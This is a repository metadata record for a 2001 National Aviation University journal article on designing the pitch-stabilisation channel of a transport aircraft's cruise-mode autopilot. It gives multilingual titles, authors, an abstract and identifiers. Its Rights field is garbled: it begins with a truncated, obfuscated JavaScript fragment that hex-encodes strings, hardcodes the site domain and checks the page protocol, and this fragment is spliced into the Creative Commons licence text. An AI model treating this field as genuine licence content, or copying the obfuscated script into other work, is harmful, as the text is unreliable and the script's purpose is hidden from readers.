Record Details

РЕЗУЛЬТАТИ АНАЛІТИЧНОГО КОНСТРУЮВАННЯ АВТОПІЛОТА ТРАНСПОРТНОГО ЛІТАКА У КРЕЙСЕРНОМУ РЕЖИМІ ПОЛЬОТУ

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title РЕЗУЛЬТАТИ АНАЛІТИЧНОГО КОНСТРУЮВАННЯ АВТОПІЛОТА ТРАНСПОРТНОГО ЛІТАКА У КРЕЙСЕРНОМУ РЕЖИМІ ПОЛЬОТУ
Результаты аналитического конструирования автопилота транспортного самолета в крейсерному режиме полета
Results of analytical design of autopilot of transport aircraft in cruise flight mode
 
Creator Кривоносенко, О. П.; Національний авіаційний університет
Сущенко, O A.; Національний авіаційний університет
Юрченко, О. М.; Національний авіаційний університет
 
Subject

УДК 681.514: 629.735.051-52 О






 
Description Виконано динамічне конструювання каналу стабілізації тангажа важкого транспортного літака в горизонтальному польоті з урахуванням випадкових збурюючих факторів іперешкод вимірників. Досліджено зміну показника якості і параметрів оптимальної системи стабілізації залежно від експлуатаційної ситуації здійснюваного польоту
Выполнено динамическое конструирование канала стабилизации тангажа тяжелого транспортного самолета в горизонтальном полете с учетом случайных возмущающих факторов и
помех измерителей. Исследовано изменение показателя качества и параметров оптимальной системы стабилизации в зависимости от эксплуатационной ситуации осуществляемого полета.
Dynamic design of the channel of stabilization of the pitch of a heavy transport aircraft in a horizontal flight is performed, taking into account random perturbing factors and
obstacles to meters. The change of the index of quality and parameters of the optimum stabilization system depending on the operating situation of the flight is studied.
 
Publisher National Aviation University
 
Contributor


 
Date 2020-01-17
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/13551
10.18372/2306-1472.11.13551
 
Source Proceedings of the National Aviation University; Том 11, № 4 (2001); 65-68
Вестник Национального авиационного университета; Том 11, № 4 (2001); 65-68
Вісник Національного Авіаційного Університету; Том 11, № 4 (2001); 65-68
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ